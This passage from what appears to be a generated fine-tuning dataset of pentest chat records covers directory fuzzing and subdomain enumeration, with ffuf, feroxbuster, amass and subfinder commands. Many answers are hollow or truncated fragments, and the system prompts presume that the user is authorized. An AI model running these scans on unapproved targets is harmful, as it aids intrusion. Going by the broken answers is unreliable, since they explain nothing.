testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Directory fuzzing - Fuzzing tools?"}, {"role": "assistant", "content": "ffuf -H \"User-Agent: PENTEST\" -c -w \"/path/to/wordlist.txt\" -maxtime-job 60 -recursion -recursion-depth 2 -u $URL/FUZZ"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Directory fuzzing - Fuzzing tools?", "response": "ffuf -H \"User-Agent: PENTEST\" -c -w \"/path/to/wordlist.txt\" -maxtime-job 60 -recursion -recursion-depth 2 -u $URL/FUZZ", "metadata": {"corpus_index": 1969, "category": "web", "source_file": "docs/src/web/recon/directory-fuzzing.md", "page_title": "Directory fuzzing", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `ffuf -H \"User-Agent: PENTEST\" -c -w \"/path/to/wordlist.txt\" -maxtime-job 60 -recursion -recursion-depth 2 -u $URL/FUZZ`?"}, {"role": "assistant", "content": "This command is used for directory fuzzing - fuzzing tools. Fuzzing tools"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `ffuf -H \"User-Agent: PENTEST\" -c -w \"/path/to/wordlist.txt\" -maxtime-job 60 -recursion -recursion-depth 2 -u $URL/FUZZ`?", "response": "This command is used for directory fuzzing - fuzzing tools. Fuzzing tools", "metadata": {"corpus_index": 1969, "category": "web", "source_file": "docs/src/web/recon/directory-fuzzing.md", "page_title": "Directory fuzzing", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the feroxbuster command to directory fuzzing - fuzzing tools"}, {"role": "assistant", "content": "feroxbuster -H \"User-Agent: PENTEST\" -w \"/path/to/wordlist.txt\" -u http://192.168.10.10/"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the feroxbuster command to directory fuzzing - fuzzing tools", "response": "feroxbuster -H \"User-Agent: PENTEST\" -w \"/path/to/wordlist.txt\" -u http://192.168.10.10/", "metadata": {"corpus_index": 1970, "category": "web", "source_file": "docs/src/web/recon/directory-fuzzing.md", "page_title": "Directory fuzzing", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "feroxbuster"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Directory fuzzing - Fuzzing tools?"}, {"role": "assistant", "content": "feroxbuster -H \"User-Agent: PENTEST\" -w \"/path/to/wordlist.txt\" -u http://192.168.10.10/"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Directory fuzzing - Fuzzing tools?", "response": "feroxbuster -H \"User-Agent: PENTEST\" -w \"/path/to/wordlist.txt\" -u http://192.168.10.10/", "metadata": {"corpus_index": 1970, "category": "web", "source_file": "docs/src/web/recon/directory-fuzzing.md", "page_title": "Directory fuzzing", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `feroxbuster -H \"User-Agent: PENTEST\" -w \"/path/to/wordlist.txt\" -u http://192.168.10.10/`?"}, {"role": "assistant", "content": "This command is used for directory fuzzing - fuzzing tools. Fuzzing tools"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `feroxbuster -H \"User-Agent: PENTEST\" -w \"/path/to/wordlist.txt\" -u http://192.168.10.10/`?", "response": "This command is used for directory fuzzing - fuzzing tools. Fuzzing tools", "metadata": {"corpus_index": 1970, "category": "web", "source_file": "docs/src/web/recon/directory-fuzzing.md", "page_title": "Directory fuzzing", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Directory fuzzing - Wordlists work?"}, {"role": "assistant", "content": "In order to fuzz more accurately, there are many dictionaries adapted for many situations, most of which can be downloaded from SecLists. SecLists can be installed (apt install seclists or downloaded directly from the GitHub repo).\n\nThe ultimate combo is ffuf + fzf + seclists.\n\n> [!SUCCESS]\n> In the following command, fzf is used to print a file fuzzer prompt allowing the user to quickly choose the perfect wordlist for content discovery.\n> \n> ``bash\n> feroxbuster -H \"User-Agent: PENTEST\" -w fzf-wordlists -u http://192.168.10.10/\n> `\n> \n> In this case, fzf-wordlists is an alias to the following command using fzf and find to fuzz wordlists from specific directories.\n> \n> `bash\n> find /usr/share/seclists /usr/share/wordlists /usr/share/dirbuster /usr/share/wfuzz /usr/share/dirb -type f | fzf\n> ``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Directory fuzzing - Wordlists work?", "response": "In order to fuzz more accurately, there are many dictionaries adapted for many situations, most of which can be downloaded from SecLists. SecLists can be installed (apt install seclists or downloaded directly from the GitHub repo).\n\nThe ultimate combo is ffuf + fzf + seclists.\n\n> [!SUCCESS]\n> In the following command, fzf is used to print a file fuzzer prompt allowing the user to quickly choose the perfect wordlist for content discovery.\n> \n> ``bash\n> feroxbuster -H \"User-Agent: PENTEST\" -w fzf-wordlists -u http://192.168.10.10/\n> `\n> \n> In this case, fzf-wordlists is an alias to the following command using fzf and find to fuzz wordlists from specific directories.\n> \n> `bash\n> find /usr/share/seclists /usr/share/wordlists /usr/share/dirbuster /usr/share/wfuzz /usr/share/dirb -type f | fzf\n> ``", "metadata": {"corpus_index": 1971, "category": "web", "source_file": "docs/src/web/recon/directory-fuzzing.md", "page_title": "Directory fuzzing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Directory fuzzing - Wordlists?"}, {"role": "assistant", "content": "In order to fuzz more accurately, there are many dictionaries adapted for many situations, most of which can be downloaded from SecLists. SecLists can be installed (apt install seclists or downloaded directly from the GitHub repo).\n\nThe ultimate combo is ffuf + fzf + seclists.\n\n> [!SUCCESS]\n> In the following command, fzf is used to print a file fuzzer prompt allowing the user to quickly choose the perfect wordlist for content discovery.\n> \n> ``bash\n> feroxbuster -H \"User-Agent: PENTEST\" -w fzf-wordlists -u http://192.168.10.10/\n> `\n> \n> In this case, fzf-wordlists is an alias to the following command using fzf and find to fuzz wordlists from specific directories.\n> \n> `bash\n> find /usr/share/seclists /usr/share/wordlists /usr/share/dirbuster /usr/share/wfuzz /usr/share/dirb -type f | fzf\n> ``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Directory fuzzing - Wordlists?", "response": "In order to fuzz more accurately, there are many dictionaries adapted for many situations, most of which can be downloaded from SecLists. SecLists can be installed (apt install seclists or downloaded directly from the GitHub repo).\n\nThe ultimate combo is ffuf + fzf + seclists.\n\n> [!SUCCESS]\n> In the following command, fzf is used to print a file fuzzer prompt allowing the user to quickly choose the perfect wordlist for content discovery.\n> \n> ``bash\n> feroxbuster -H \"User-Agent: PENTEST\" -w fzf-wordlists -u http://192.168.10.10/\n> `\n> \n> In this case, fzf-wordlists is an alias to the following command using fzf and find to fuzz wordlists from specific directories.\n> \n> `bash\n> find /usr/share/seclists /usr/share/wordlists /usr/share/dirbuster /usr/share/wfuzz /usr/share/dirb -type f | fzf\n> ``", "metadata": {"corpus_index": 1971, "category": "web", "source_file": "docs/src/web/recon/directory-fuzzing.md", "page_title": "Directory fuzzing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Subdomains enumeration - Theory work?"}, {"role": "assistant", "content": "When conducting penetration tests on a website, or on a *.domain.com scope, finding subdomains of the target can help widen the attack surface. There are many different techniques to find subdomains that can be divided in two main categories."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Subdomains enumeration - Theory work?", "response": "When conducting penetration tests on a website, or on a *.domain.com scope, finding subdomains of the target can help widen the attack surface. There are many different techniques to find subdomains that can be divided in two main categories.", "metadata": {"corpus_index": 1972, "category": "credentials", "source_file": "docs/src/web/recon/domains-enumeration.md", "page_title": "Subdomains enumeration", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Subdomains enumeration - Theory"}, {"role": "assistant", "content": "When conducting penetration tests on a website, or on a *.domain.com scope, finding subdomains of the target can help widen the attack surface. There are many different techniques to find subdomains that can be divided in two main categories."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Subdomains enumeration - Theory", "response": "When conducting penetration tests on a website, or on a *.domain.com scope, finding subdomains of the target can help widen the attack surface. There are many different techniques to find subdomains that can be divided in two main categories.", "metadata": {"corpus_index": 1972, "category": "credentials", "source_file": "docs/src/web/recon/domains-enumeration.md", "page_title": "Subdomains enumeration", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Subdomains enumeration - Passive techniques"}, {"role": "assistant", "content": "Attackers don't connect directly to the target systems and stay under the radar.\n\n* Certificate Transparency\n* ASN Discovery\n* Search engines (Google & Bing Dorking)\n* DNS aggregators/datasets (Github, Virustotal, DNSdumpster etc)\n* Subject alternate name (SAN)\n* Using public datasets\n* DNS enum using Cloudflare"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Subdomains enumeration - Passive techniques", "response": "Attackers don't connect directly to the target systems and stay under the radar.\n\n* Certificate Transparency\n* ASN Discovery\n* Search engines (Google & Bing Dorking)\n* DNS aggregators/datasets (Github, Virustotal, DNSdumpster etc)\n* Subject alternate name (SAN)\n* Using public datasets\n* DNS enum using Cloudflare", "metadata": {"corpus_index": 1973, "category": "credentials", "source_file": "docs/src/web/recon/domains-enumeration.md", "page_title": "Subdomains enumeration", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Subdomains enumeration - Passive techniques during a pentest?"}, {"role": "assistant", "content": "Attackers don't connect directly to the target systems and stay under the radar.\n\n* Certificate Transparency\n* ASN Discovery\n* Search engines (Google & Bing Dorking)\n* DNS aggregators/datasets (Github, Virustotal, DNSdumpster etc)\n* Subject alternate name (SAN)\n* Using public datasets\n* DNS enum using Cloudflare"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Subdomains enumeration - Passive techniques during a pentest?", "response": "Attackers don't connect directly to the target systems and stay under the radar.\n\n* Certificate Transparency\n* ASN Discovery\n* Search engines (Google & Bing Dorking)\n* DNS aggregators/datasets (Github, Virustotal, DNSdumpster etc)\n* Subject alternate name (SAN)\n* Using public datasets\n* DNS enum using Cloudflare", "metadata": {"corpus_index": 1973, "category": "credentials", "source_file": "docs/src/web/recon/domains-enumeration.md", "page_title": "Subdomains enumeration", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Subdomains enumeration - Active techniques?"}, {"role": "assistant", "content": "Attackers obtain information directly from the target systems. The results may be more useful but can raise some alerts on the defenders side.\n\n* HTTP virtual host fuzzing\n* HTTP headers\n* DNS zone transfers\n* DNS bruteforcing\n* DNS zone walking\n* DNS cache snooping\n* DNS records (CNAME, SPF)\n* Reverse DNS sweeping\n\nDetailing every technique mentioned above would be a duplicate to other blogposts that already do (cf. Resources)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Subdomains enumeration - Active techniques?", "response": "Attackers obtain information directly from the target systems. The results may be more useful but can raise some alerts on the defenders side.\n\n* HTTP virtual host fuzzing\n* HTTP headers\n* DNS zone transfers\n* DNS bruteforcing\n* DNS zone walking\n* DNS cache snooping\n* DNS records (CNAME, SPF)\n* Reverse DNS sweeping\n\nDetailing every technique mentioned above would be a duplicate to other blogposts that already do (cf. Resources).", "metadata": {"corpus_index": 1974, "category": "credentials", "source_file": "docs/src/web/recon/domains-enumeration.md", "page_title": "Subdomains enumeration", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Subdomains enumeration - Active techniques"}, {"role": "assistant", "content": "Attackers obtain information directly from the target systems. The results may be more useful but can raise some alerts on the defenders side.\n\n* HTTP virtual host fuzzing\n* HTTP headers\n* DNS zone transfers\n* DNS bruteforcing\n* DNS zone walking\n* DNS cache snooping\n* DNS records (CNAME, SPF)\n* Reverse DNS sweeping\n\nDetailing every technique mentioned above would be a duplicate to other blogposts that already do (cf. Resources)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Subdomains enumeration - Active techniques", "response": "Attackers obtain information directly from the target systems. The results may be more useful but can raise some alerts on the defenders side.\n\n* HTTP virtual host fuzzing\n* HTTP headers\n* DNS zone transfers\n* DNS bruteforcing\n* DNS zone walking\n* DNS cache snooping\n* DNS records (CNAME, SPF)\n* Reverse DNS sweeping\n\nDetailing every technique mentioned above would be a duplicate to other blogposts that already do (cf. Resources).", "metadata": {"corpus_index": 1974, "category": "credentials", "source_file": "docs/src/web/recon/domains-enumeration.md", "page_title": "Subdomains enumeration", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Subdomains enumeration - Google & Bing Dorks in the context of penetration testing"}, {"role": "assistant", "content": "Search engines like Google and Bing offer Dorking features that can be used to gather specific information.\n\n On Google, the site: operator can be used to find subdomains. The minus (-) operator can also be used to exclude subdomains that are already known (e.g. site:.thehacker.recipes -www).\n* On Bing, the same site: operator can be used (e.g. site:thehacker.recipes)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Subdomains enumeration - Google & Bing Dorks in the context of penetration testing", "response": "Search engines like Google and Bing offer Dorking features that can be used to gather specific information.\n\n On Google, the site: operator can be used to find subdomains. The minus (-) operator can also be used to exclude subdomains that are already known (e.g. site:.thehacker.recipes -www).\n* On Bing, the same site: operator can be used (e.g. site:thehacker.recipes).", "metadata": {"corpus_index": 1975, "category": "credentials", "source_file": "docs/src/web/recon/domains-enumeration.md", "page_title": "Subdomains enumeration", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Subdomains enumeration - Google & Bing Dorks"}, {"role": "assistant", "content": "Search engines like Google and Bing offer Dorking features that can be used to gather specific information.\n\n On Google, the site: operator can be used to find subdomains. The minus (-) operator can also be used to exclude subdomains that are already known (e.g. site:.thehacker.recipes -www).\n* On Bing, the same site: operator can be used (e.g. site:thehacker.recipes)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Subdomains enumeration - Google & Bing Dorks", "response": "Search engines like Google and Bing offer Dorking features that can be used to gather specific information.\n\n On Google, the site: operator can be used to find subdomains. The minus (-) operator can also be used to exclude subdomains that are already known (e.g. site:.thehacker.recipes -www).\n* On Bing, the same site: operator can be used (e.g. site:thehacker.recipes).", "metadata": {"corpus_index": 1975, "category": "credentials", "source_file": "docs/src/web/recon/domains-enumeration.md", "page_title": "Subdomains enumeration", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Subdomains enumeration - Certificate Transparency in the context of penetration testing"}, {"role": "assistant", "content": "> Certificate Transparency(CT) is a project under which a Certificate Authority(CA) has to publish every SSL/TLS certificate they issue to a public log. An SSL/TLS certificate usually contains domain names, sub-domain names and email addresses.\n>\n> (blog.appsecco.com)\n\nThe following websites allow to search through their CT logs: crt.sh, censys.io, Facebook's CT monitor, Google's CT monitor.\n\nFindomain (Rust), Subfinder (Go) and Assetfinder (Go) mainly rely on Certificate Transparency logs enumeration.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Subdomains enumeration - Certificate Transparency in the context of penetration testing", "response": "> Certificate Transparency(CT) is a project under which a Certificate Authority(CA) has to publish every SSL/TLS certificate they issue to a public log. An SSL/TLS certificate usually contains domain names, sub-domain names and email addresses.\n>\n> (blog.appsecco.com)\n\nThe following websites allow to search through their CT logs: crt.sh, censys.io, Facebook's CT monitor, Google's CT monitor.\n\nFindomain (Rust), Subfinder (Go) and Assetfinder (Go) mainly rely on Certificate Transparency logs enumeration.\n\n```bash", "metadata": {"corpus_index": 1976, "category": "credentials", "source_file": "docs/src/web/recon/domains-enumeration.md", "page_title": "Subdomains enumeration", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Subdomains enumeration - Certificate Transparency?"}, {"role": "assistant", "content": "> Certificate Transparency(CT) is a project under which a Certificate Authority(CA) has to publish every SSL/TLS certificate they issue to a public log. An SSL/TLS certificate usually contains domain names, sub-domain names and email addresses.\n>\n> (blog.appsecco.com)\n\nThe following websites allow to search through their CT logs: crt.sh, censys.io, Facebook's CT monitor, Google's CT monitor.\n\nFindomain (Rust), Subfinder (Go) and Assetfinder (Go) mainly rely on Certificate Transparency logs enumeration.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Subdomains enumeration - Certificate Transparency?", "response": "> Certificate Transparency(CT) is a project under which a Certificate Authority(CA) has to publish every SSL/TLS certificate they issue to a public log. An SSL/TLS certificate usually contains domain names, sub-domain names and email addresses.\n>\n> (blog.appsecco.com)\n\nThe following websites allow to search through their CT logs: crt.sh, censys.io, Facebook's CT monitor, Google's CT monitor.\n\nFindomain (Rust), Subfinder (Go) and Assetfinder (Go) mainly rely on Certificate Transparency logs enumeration.\n\n```bash", "metadata": {"corpus_index": 1976, "category": "credentials", "source_file": "docs/src/web/recon/domains-enumeration.md", "page_title": "Subdomains enumeration", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Pipe subfinder with httpx to find HTTP services"}, {"role": "assistant", "content": "echo \"target.domain\" | subfinder -silent | httpx -silent"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Pipe subfinder with httpx to find HTTP services", "response": "echo \"target.domain\" | subfinder -silent | httpx -silent", "metadata": {"corpus_index": 1977, "category": "credentials", "source_file": "docs/src/web/recon/domains-enumeration.md", "page_title": "Subdomains enumeration", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Pipe subfinder with httpx to find HTTP services"}, {"role": "assistant", "content": "echo \"target.domain\" | subfinder -silent | httpx -silent"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Pipe subfinder with httpx to find HTTP services", "response": "echo \"target.domain\" | subfinder -silent | httpx -silent", "metadata": {"corpus_index": 1977, "category": "credentials", "source_file": "docs/src/web/recon/domains-enumeration.md", "page_title": "Subdomains enumeration", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Subdomains enumeration - Virtual host fuzzing"}, {"role": "assistant", "content": "A specific page has been written for this topic.\n\n> [!TIP]\n> Read the Virtual host fuzzing article for more insight"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Subdomains enumeration - Virtual host fuzzing", "response": "A specific page has been written for this topic.\n\n> [!TIP]\n> Read the Virtual host fuzzing article for more insight", "metadata": {"corpus_index": 1978, "category": "credentials", "source_file": "docs/src/web/recon/domains-enumeration.md", "page_title": "Subdomains enumeration", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Subdomains enumeration - Virtual host fuzzing during a pentest?"}, {"role": "assistant", "content": "A specific page has been written for this topic.\n\n> [!TIP]\n> Read the Virtual host fuzzing article for more insight"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Subdomains enumeration - Virtual host fuzzing during a pentest?", "response": "A specific page has been written for this topic.\n\n> [!TIP]\n> Read the Virtual host fuzzing article for more insight", "metadata": {"corpus_index": 1978, "category": "credentials", "source_file": "docs/src/web/recon/domains-enumeration.md", "page_title": "Subdomains enumeration", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Subdomains enumeration - Amass"}, {"role": "assistant", "content": "OWASP's Amass (Go) tool can gather information through DNS bruteforcing, DNS sweeping, NSED zone walking, DNS zone transfer, through web archives, through online DNS datasets and aggregators APIs, etc.\n\n``bash\namass enum --passive -d \"domain.com\"\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Subdomains enumeration - Amass", "response": "OWASP's Amass (Go) tool can gather information through DNS bruteforcing, DNS sweeping, NSED zone walking, DNS zone transfer, through web archives, through online DNS datasets and aggregators APIs, etc.\n\n``bash\namass enum --passive -d \"domain.com\"\n``", "metadata": {"corpus_index": 1979, "category": "credentials", "source_file": "docs/src/web/recon/domains-enumeration.md", "page_title": "Subdomains enumeration", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Subdomains enumeration - Amass during a pentest?"}, {"role": "assistant", "content": "OWASP's Amass (Go) tool can gather information through DNS bruteforcing, DNS sweeping, NSED zone walking, DNS zone transfer, through web archives, through online DNS datasets and aggregators APIs, etc.\n\n``bash\namass enum --passive -d \"domain.com\"\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Subdomains enumeration - Amass during a pentest?", "response": "OWASP's Amass (Go) tool can gather information through DNS bruteforcing, DNS sweeping, NSED zone walking, DNS zone transfer, through web archives, through online DNS datasets and aggregators APIs, etc.\n\n``bash\namass enum --passive -d \"domain.com\"\n``", "metadata": {"corpus_index": 1979, "category": "credentials", "source_file": "docs/src/web/recon/domains-enumeration.md", "page_title": "Subdomains enumeration", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the amass syntax for subdomains enumeration - amass?"}, {"role": "assistant", "content": "amass enum --passive -d \"domain.com\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the amass syntax for subdomains enumeration - amass?", "response": "amass enum --passive -d \"domain.com\"", "metadata": {"corpus_index": 1980, "category": "credentials", "source_file": "docs/src/web/recon/domains-enumeration.md", "page_title": "Subdomains enumeration", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "amass"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Subdomains enumeration - Amass"}, {"role": "assistant", "content": "amass enum --passive -d \"domain.com\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Subdomains enumeration - Amass", "response": "amass enum --passive -d \"domain.com\"", "metadata": {"corpus_index": 1980, "category": "credentials", "source_file": "docs/src/web/recon/domains-enumeration.md", "page_title": "Subdomains enumeration", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `amass enum --passive -d \"domain.com\"`?"}, {"role": "assistant", "content": "This command is used for subdomains enumeration - amass. Amass"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `amass enum --passive -d \"domain.com\"`?", "response": "This command is used for subdomains enumeration - amass. Amass", "metadata": {"corpus_index": 1980, "category": "credentials", "source_file": "docs/src/web/recon/domains-enumeration.md", "page_title": "Subdomains enumeration", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism 